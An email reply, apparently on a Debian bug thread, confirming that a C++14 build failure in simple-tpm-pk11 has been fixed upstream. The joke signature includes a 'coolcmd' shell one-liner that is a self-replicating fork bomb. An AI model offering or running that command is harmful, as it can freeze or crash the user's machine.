On Sat, 15 Jul 2023 01:06:53 +0100, Adrian Bunk <b...@debian.org> said: > ... > In file included from /usr/include/gtest/gtest-message.h:57, > from /usr/include/gtest/gtest-assertion-result.h:46, > from /usr/include/gtest/gtest.h:64, > from /usr/src/gtest/src/gtest_main.cc:32, > from src/libgtest.cc:20: > /usr/include/gtest/internal/gtest-port.h:270:2: error: #error C++ versions > less than C++14 are not supported. > 270 | #error C++ versions less than C++14 are not supported. > | ^~~~~ > ... > > > This can be fixed by removing the -std=gnu++0x > in configure.ac
Thanks for the bug report. I have now done this upstream: github.com/ThomasHabets/simple-tpm-pk11/ -- typedef struct me_s { char name[] = { "Thomas Habets" }; char email[] = { "tho...@habets.se" }; char kernel[] = { "Linux" }; char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" }; char pgp[] = { "9907 8698 8A24 F52F 1C2E 87F6 39A4 9EEA 460A 0169" }; char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" }; } me_t;